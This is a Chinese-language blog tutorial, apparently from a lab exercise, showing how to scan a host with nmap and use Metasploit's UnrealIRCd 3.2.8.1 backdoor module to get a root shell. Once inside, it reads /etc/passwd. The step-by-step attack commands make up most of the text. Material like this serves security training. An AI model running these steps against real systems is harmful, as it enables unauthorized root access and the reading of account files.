Metasploit溢出UnrealIRCd后门漏洞

发布时间:2020-10-06 06:02:39 作者:白帽生活
来源:网络 阅读:1802

Metasploit溢出UnrealIRCd后门漏洞


利用UnrealIRCd后门漏洞,获取目标主机的root权限。


某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。



一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。


1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。

Metasploit溢出UnrealIRCd后门漏洞


1.3在终端中输入命令“msfconsole”,启动MSF终端。

Metasploit溢出UnrealIRCd后门漏洞



1.4在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和***载荷。

Metasploit溢出UnrealIRCd后门漏洞


1.5在终端中输入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

Metasploit溢出UnrealIRCd后门漏洞


1.6在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

Metasploit溢出UnrealIRCd后门漏洞



Metasploit溢出UnrealIRCd后门漏洞


1.8在终端中输入“exploit”, 开始向目标主机***,***成功后,建立shell会话。


1.9在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。

Metasploit溢出UnrealIRCd后门漏洞

推荐阅读:
  1. 使用Metasploit利用MS08-067漏洞渗 透xp
  2. Microsoft SQL Server 堆栈溢出漏洞加固

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

主机 search root权限

上一篇:vue 1.x 交互实现仿百度下拉列表示例

下一篇:python使用tomorrow实现多线程的例子

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》